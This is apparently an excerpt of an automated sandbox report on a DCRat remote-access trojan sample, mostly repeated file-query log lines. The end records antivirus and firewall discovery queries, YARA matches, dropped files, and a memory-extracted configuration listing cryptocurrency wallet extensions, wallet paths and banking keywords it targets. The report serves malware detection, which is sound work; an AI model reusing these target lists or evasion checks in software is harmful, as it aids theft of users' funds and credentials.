                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00B3DF1E
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B2B146 GetVersionExW,0_2_00B2B146
                          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: updIMdPUj8.exe, type: SAMPLE
                          Source: Yara matchFile source: 5.0.hypersurrogateComponentdhcp.exe.ba0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.1842993642.0000000000BA2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.2935880086.0000000003199000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: updIMdPUj8.exe PID: 7324, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: hypersurrogateComponentdhcp.exe PID: 7600, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: ZWgKQlTqcrSB.exe PID: 3300, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Recovery\csrss.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe, type: DROPPED
                          Source: Yara matchFile source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe, type: DROPPED
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\8
                          Source: hypersurrogateComponentdhcp.exe, 00000005.00000002.1889265427.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"Current User","_3":"True"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;example.com;any.domain.net","_1":"mail.google.com;example.com;any.domain.net"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"","_1":"Full path"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"15000000","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
